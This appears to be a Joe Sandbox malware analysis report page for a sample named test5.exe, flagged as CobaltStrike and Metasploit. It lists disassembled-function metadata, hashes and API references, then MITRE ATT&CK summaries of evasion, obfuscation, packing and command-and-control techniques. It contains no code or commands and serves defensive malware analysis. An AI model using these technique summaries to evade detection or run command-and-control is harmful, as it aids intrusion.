Function 000002155374DD1F Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000002155374DDBC

Part of subcall function 000002155375C9C3: _errno.LIBCMT ref: 000002155375C9FA
Part of subcall function 000002155375C9C3: _invalid_parameter_noinfo.LIBCMT ref: 000002155375CA05

_snprintf.LIBCMT ref: 000002155374DDD8
_snprintf.LIBCMT ref: 000002155374DE4E
_snprintf.LIBCMT ref: 000002155374DE65

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction ID: c67f561b4d7ba009ebbd12abb2e34f6fa8fcf7854fb309c1b9506110fb7843f2
Opcode Fuzzy Hash: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction Fuzzy Hash: DA619530A18E58CFEB95EB58D8857DA73E6FBF4304F500569E44AC3292DF34DA458B82

Function 0000021551BF4300 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551BF4363

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction ID: ce92724b795f8e71e5f1849a33e73da6708ed0e70957708b4ce9790a3c7bd9c9
Opcode Fuzzy Hash: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction Fuzzy Hash: 0551C930218E159BDB58DF2CD4C92B977D2FBE5320F8045ADE84BC3286EE30EC428645

Function 0000021553743747 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00000215537437AA

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction ID: 2e387f2f85efd81f42ac7cb6a0561121147caa2d31d9bb284dfd539adb61c193
Opcode Fuzzy Hash: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction Fuzzy Hash: 6451C830628E159BEF9C9F6C94897BAB3D6FBD4310F50059DE85FC3286EA20FD164681

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report test5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Threatname: Metasploit

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
test5.exe

Function 0068C980 Relevance: 12.9, Strings: 10, Instructions: 385
COMMON

Function 006B25C0 Relevance: 12.7, Strings: 10, Instructions: 247
COMMON

Function 006B0D80 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Function 00682060 Relevance: 7.9, Strings: 6, Instructions: 430
COMMON

Function 0000021551B0015A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
networkmemoryfileCOMMON

Function 0000021551BFE3A4 Relevance: 9.2, APIs: 6, Instructions: 239
networkCOMMONLIBRARYCODE

Function 0000021551BFCA74 Relevance: 7.8, APIs: 6, Instructions: 347
COMMONLIBRARYCODE

Function 0000021551BFEC4C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
networkCOMMONLIBRARYCODE

Function 0000021551B00101 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
librarynetworkCOMMON